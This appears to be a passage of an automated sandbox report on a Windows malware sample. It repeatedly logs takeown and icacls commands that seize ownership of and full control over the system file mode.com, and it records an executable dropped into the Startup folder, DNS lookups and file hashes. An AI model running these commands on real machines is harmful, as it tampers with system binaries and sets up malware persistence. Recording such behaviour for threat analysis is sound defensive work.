"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

Network

Country Destination Domain Proto
US 8.8.8.8:53 20.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
US 8.8.8.8:53 75.117.19.2.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp

Files

memory/5108-0-0x00007FFB52733000-0x00007FFB52735000-memory.dmp

memory/5108-1-0x000001CFC4580000-0x000001CFC45A8000-memory.dmp

memory/5108-2-0x00007FFB52730000-0x00007FFB531F1000-memory.dmp

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\DY76wCwbUm.exe

MD5 267bc9803be6b45b13355df903b7732b
SHA1 44dbc73c5829dedced57f8864cbbbebfa8660919
SHA256 0b1077aa343cab3d126e46fcf56e04684cee1a0624a95a71506ee54f910c9698
SHA512 5330008e14d68cf4a9d1f25e33adaa89c9abe4ba35697bb3e88905d8a5307a4e8ddbb4720bfb6df65f098b27dca848eb15792766170d17f75be06ce275dae7c0

memory/5108-1024-0x00007FFB52733000-0x00007FFB52735000-memory.dmp

memory/5108-1140-0x00007FFB52730000-0x00007FFB531F1000-memory.dmp

C:\Windows\System32\mode.com

MD5 5e71c60108a69fee2eb70befab588eb4
SHA1 e2b353bd6783e57a5be29ca339df10ca8d8a7d8c
SHA256 d94fc4c6d404ddb04d00618ea4514dc38d1145b67cfee54ccb3636fd34c81956
SHA512 a298afa4b9c98fd5e95079d369e382da42bee829a3a47e1f1a1080e7d6e51d16ae38443fc8a37dbc52672a0cfc17ae2114142363fdaa8d78929c2390bc67210c

C:\Windows\System32\mode.com

MD5 da0233ab62c02a67b582d38115fa6ddd
SHA1 0aa720bea5e04f285a40928e3f686096e423b2f6
